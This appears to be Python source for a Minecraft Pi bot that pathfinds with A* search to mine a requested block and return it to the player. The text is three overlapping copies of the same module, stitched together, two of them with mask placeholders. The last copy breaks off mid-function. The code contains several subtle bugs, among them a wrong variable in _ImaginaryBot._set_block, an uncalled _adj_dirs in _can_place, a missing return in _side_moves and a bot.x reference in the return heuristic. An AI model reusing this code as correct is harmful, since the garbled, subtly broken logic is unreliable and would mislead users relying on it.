block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(
) + player_loc) / 2, 'kwargs': {'block': block_id}})
self.take_actions(return_actions, _DELAY)
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z
) and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x
) + abs(diff.z) == 2 and state.get_block(self._player_loc +
diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
<mask token>
def _player_loc():
"""Return the player's location."""
return _to_my_vec3(_get_mc().player.getTilePos())
<mask token>
def _all_dirs():
"""Return all adjacent directions."""
return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]
<mask token>
def _key_vals(dict_):
"""Return a list of key-val tuples."""
return [(key, val) for key, val in dict_.iteritems()]
| <mask token>
class _Vec3(Vec3):
"""A Vec3 that is hashable. Everything in this program should use this
class."""
def __hash__(self):
"""Return the hash."""
return hash((self.x, self.y, self.z))
def clone(self):
"""Return a clone."""
return _Vec3(self.x, self.y, self.z)
class _GenericBot:
"""A generic bot."""
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
def take_action(self, action):
"""Take the action (acquired from _get_legal_actions)."""
getattr(self, action['func'])(*action.get('args', ()), **action.get
('kwargs', {}))
def take_actions(self, actions, seconds=None):
"""Take these actions. If seconds is not None, sleep 'seconds'
seconds.
"""
if not actions:
return
self.take_action(actions[0])
for action in actions[1:]:
if seconds is not None:
sleep(seconds)
self.take_action(action)
def get_pos(self):
"""Return the position."""
return deepcopy(self._pos)
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions(
) + self._get_placement_actions(block_)
def contains(self, block_):
"""Return whether or not the bot contains the block id."""
return block_ in self._inventory
def _get_block(self, pos):
"""Get the block at the position."""
raise NotImplementedError
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception(
'You requested not to place %s, but it is the only block in the inventory.'
% exclude)
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
def _move_down(self):
"""Move and mine the block below."""
new_pos = self._pos + _Vec3(0, -1, 0)
block_ = self._get_block(new_pos)
if block_ != _WATER:
self._add_to_inv(block_)
self._move(new_pos)
def _add_to_inv(self, block_):
"""Add the block to the inventory."""
if block_ in self._inventory:
self._inventory[block_] += 1
else:
self._inventory[block_] = 1
def _move_up(self, exclude=None):
"""Move and place a block below.
If exclude is not None, place a block that is not 'exclude'.
"""
self._move(self._pos + _Vec3(0, 1, 0))
self._place(self._pos + _Vec3(0, -1, 0), exclude)
def _mine(self, loc):
"""Mine the block."""
block_ = self._get_block(loc)
self._add_to_inv(block_)
self._set_block(loc, _AIR)
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,
_WATER}
if can_move_up:
if self._surrounded():
rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,
1, 0),)})
else:
rtn.append({'func': '_move_up', 'args': (exclude,)})
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,
0),)})
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({'func': '_move', 'args': (pos + _Vec3(0,
1, 0),)})
break
pos.y -= 1
def _surrounded(self):
"""Return whether or not the bot is surrounded by water."""
for dir_ in _adj_dirs():
if self._get_block(self._pos + dir_) != _WATER:
return False
return True
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos_above,)})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos,)})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {
'exclude': exclude}})
return rtn
def _can_place(self, loc):
"""Return whether or not the bot can place a block at that location
independent of what it has in its inventory."""
non_blocks = [_AIR, _WATER, _LAVA]
player = [self._pos, self._pos + _Vec3(0, 1, 0)]
for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):
new_loc = loc + dir_
if new_loc not in player and self._get_block(new_loc
) not in non_blocks:
return True
return False
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
raise NotImplementedError
def _move(self, pos):
"""Move there only."""
self._pos = deepcopy(pos)
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {}
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
self._changes[deepcopy(pos)] = block
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + _key_vals(self._inventory) +
_key_vals(self._changes)))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
block_id = getattr(block, block_name).id
block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(
) + player_loc) / 2, 'kwargs': {'block': block_id}})
self.take_actions(return_actions, _DELAY)
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z
) and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x
) + abs(diff.z) == 2 and state.get_block(self._player_loc +
diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
def _mine_heuristic(bot, problem):
"""Return the mining heuristic.
bot is an _ImaginaryBot.
"""
if bot.contains(problem.get_block_id()):
return 0
bot_pos = bot.get_pos()
dest_pos = problem.get_block_loc()
man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))
y_diff = bot_pos.y - dest_pos.y
if y_diff < 0:
y_diff += 1
if y_diff == 0:
return man_dist
drop = _DROP if y_diff > 0 else 1
y_diff = abs(y_diff)
drops = _drops(y_diff, drop)
if man_dist > drops:
return man_dist
if man_dist == drops:
return man_dist + 1
if drop == 1:
return drops
if y_diff % drop == 1:
return drops
return drops + 1
<mask token>
def _return_heuristic(bot, problem):
"""Return the return heuristic.
bot is an _ImaginaryBot.
"""
bot_pos = bot.get_pos()
player_pos = problem.get_player_loc()
bot_plane_pos = bot.x, bot.z
y_diff = bot_pos.y - player_pos.y
drop = _DROP if y_diff > 0 else 1
y_diff = abs(y_diff)
drops = _drops(y_diff, drop)
min_man = float('inf')
for dir_ in _adj_dirs():
loc = player_pos + 2 * dir_
man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))
if man_dist < min_man:
min_man = man_dist
if man_dist < drops:
return drops
return min_man
def _to_my_vec3(vec):
"""Return the _Vec3 alternative of the Vec3."""
return _Vec3(vec.x, vec.y, vec.z)
def _player_loc():
"""Return the player's location."""
return _to_my_vec3(_get_mc().player.getTilePos())
def _adj_dirs():
"""Return the adjacent directions."""
return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]
def _all_dirs():
"""Return all adjacent directions."""
return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]
<mask token>
def _key_vals(dict_):
"""Return a list of key-val tuples."""
return [(key, val) for key, val in dict_.iteritems()]
| """Module for the bot"""
from copy import deepcopy
from time import sleep
import mcpi.minecraft as minecraft
from mcpi.vec3 import Vec3
import mcpi.block as block
from search import SearchProblem, astar, bfs
from singleton import singleton
_AIR = block.AIR.id
_WATER = block.WATER.id
_LAVA = block.LAVA.id
_BEDROCK = block.BEDROCK.id
_DROP = 2 # It can drop at most this many
_DROP_PLUS_1 = _DROP + 1
_DELAY = 1
class _Vec3(Vec3):
"""A Vec3 that is hashable. Everything in this program should use this
class."""
def __hash__(self):
"""Return the hash."""
return hash((self.x, self.y, self.z))
def clone(self):
"""Return a clone."""
return _Vec3(self.x, self.y, self.z)
class _GenericBot:
"""A generic bot."""
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
def take_action(self, action):
"""Take the action (acquired from _get_legal_actions)."""
getattr(self, action['func'])(
*action.get('args', ()),
**action.get('kwargs', {})
)
def take_actions(self, actions, seconds=None):
"""Take these actions. If seconds is not None, sleep 'seconds'
seconds.
"""
if not actions:
return
self.take_action(actions[0])
for action in actions[1:]:
if seconds is not None:
sleep(seconds)
self.take_action(action)
def get_pos(self):
"""Return the position."""
return deepcopy(self._pos)
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions() + \
self._get_placement_actions(block_)
def contains(self, block_):
"""Return whether or not the bot contains the block id."""
return block_ in self._inventory
def _get_block(self, pos):
"""Get the block at the position."""
raise NotImplementedError
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception((
'You requested not to place %s, but it is the only '
'block in the inventory.' % exclude
))
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
def _move_down(self):
"""Move and mine the block below."""
new_pos = self._pos + _Vec3(0, -1, 0)
block_ = self._get_block(new_pos)
if block_ != _WATER:
self._add_to_inv(block_)
self._move(new_pos)
def _add_to_inv(self, block_):
"""Add the block to the inventory."""
if block_ in self._inventory:
self._inventory[block_] += 1
else:
self._inventory[block_] = 1
def _move_up(self, exclude=None):
"""Move and place a block below.
If exclude is not None, place a block that is not 'exclude'.
"""
self._move(self._pos + _Vec3(0, 1, 0))
self._place(self._pos + _Vec3(0, -1, 0), exclude)
def _mine(self, loc):
"""Mine the block."""
block_ = self._get_block(loc)
self._add_to_inv(block_)
self._set_block(loc, _AIR)
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
# Check for moving up
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR, _WATER}
if can_move_up:
if self._surrounded():
rtn.append({
'func': '_move',
'args': (self._pos + _Vec3(0, 1, 0),)
})
else:
rtn.append({
'func': '_move_up',
'args': (exclude,)
})
# Check for moving down
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
# Check for side moves
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
# Check if it can move up
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({
'func': '_move',
'args': (base_pos + _Vec3(0, 1, 0),)
})
# Check if it can move in that direction
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
# Fall
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({
'func': '_move',
'args': (pos + _Vec3(0, 1, 0),)
})
break
pos.y -= 1
def _surrounded(self):
"""Return whether or not the bot is surrounded by water."""
for dir_ in _adj_dirs():
if self._get_block(self._pos + dir_) != _WATER:
return False
return True
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
# Mine above.
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({
'func': '_mine',
'args': (pos_above,)
})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({
'func': '_mine',
'args': (pos,)
})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({
'func': '_place',
'args': (pos,),
'kwargs': {'exclude': exclude}
})
return rtn
def _can_place(self, loc):
"""Return whether or not the bot can place a block at that location
independent of what it has in its inventory."""
non_blocks = [_AIR, _WATER, _LAVA]
player = [self._pos, self._pos + _Vec3(0, 1, 0)]
for dir_ in _adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]:
new_loc = loc + dir_
if new_loc not in player and self._get_block(new_loc) \
not in non_blocks:
return True
return False
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
raise NotImplementedError
def _move(self, pos):
"""Move there only."""
self._pos = deepcopy(pos)
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {} # Changes to the world
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
self._changes[deepcopy(pos)] = block
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + \
_key_vals(self._inventory) + \
_key_vals(self._changes)
))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
block_id = getattr(block, block_name).id
block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({
'func': '_place',
'args': (imag_bot.get_pos() + player_loc) / 2,
'kwargs': {'block': block_id}
})
self.take_actions(return_actions, _DELAY)
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z) \
and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and \
abs(diff.x) + abs(diff.z) == 2 and \
state.get_block(self._player_loc + diff/2 + _Vec3(0, -1, 0)) not in \
(_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
def _mine_heuristic(bot, problem):
"""Return the mining heuristic.
bot is an _ImaginaryBot.
"""
if bot.contains(problem.get_block_id()):
return 0
bot_pos = bot.get_pos()
dest_pos = problem.get_block_loc()
# If man == dy: return man + 1
# If man > dy: return man
# If man < dy: return dy?
man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))
y_diff = bot_pos.y - dest_pos.y
if y_diff < 0:
y_diff += 1
if y_diff == 0:
return man_dist
# Transform so that it's only dropping
drop = _DROP if y_diff > 0 else 1
y_diff = abs(y_diff)
drops = _drops(y_diff, drop)
if man_dist > drops:
return man_dist
if man_dist == drops:
return man_dist + 1
if drop == 1:
return drops
if y_diff % drop == 1:
return drops
return drops + 1
def _drops(dist, drop):
"""Return the number of times it takes to drop a distance dist. drop is the
length of one drop. Both are assumed positive."""
rtn = dist / drop
if dist % drop != 0:
rtn += 1
return rtn
def _return_heuristic(bot, problem):
"""Return the return heuristic.
bot is an _ImaginaryBot.
"""
bot_pos = bot.get_pos()
player_pos = problem.get_player_loc()
bot_plane_pos = (bot.x, bot.z)
y_diff = bot_pos.y - player_pos.y
drop = _DROP if y_diff > 0 else 1
y_diff = abs(y_diff)
drops = _drops(y_diff, drop)
min_man = float('inf')
for dir_ in _adj_dirs():
loc = player_pos + 2 * dir_
man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))
if man_dist < min_man:
min_man = man_dist
if man_dist < drops:
return drops
return min_man
def _to_my_vec3(vec):
"""Return the _Vec3 alternative of the Vec3."""
return _Vec3(vec.x, vec.y, vec.z)
def _player_loc():
"""Return the player's location."""
return _to_my_vec3(_get_mc().player.getTilePos())
def _adj_dirs():
"""Return the adjacent directions."""
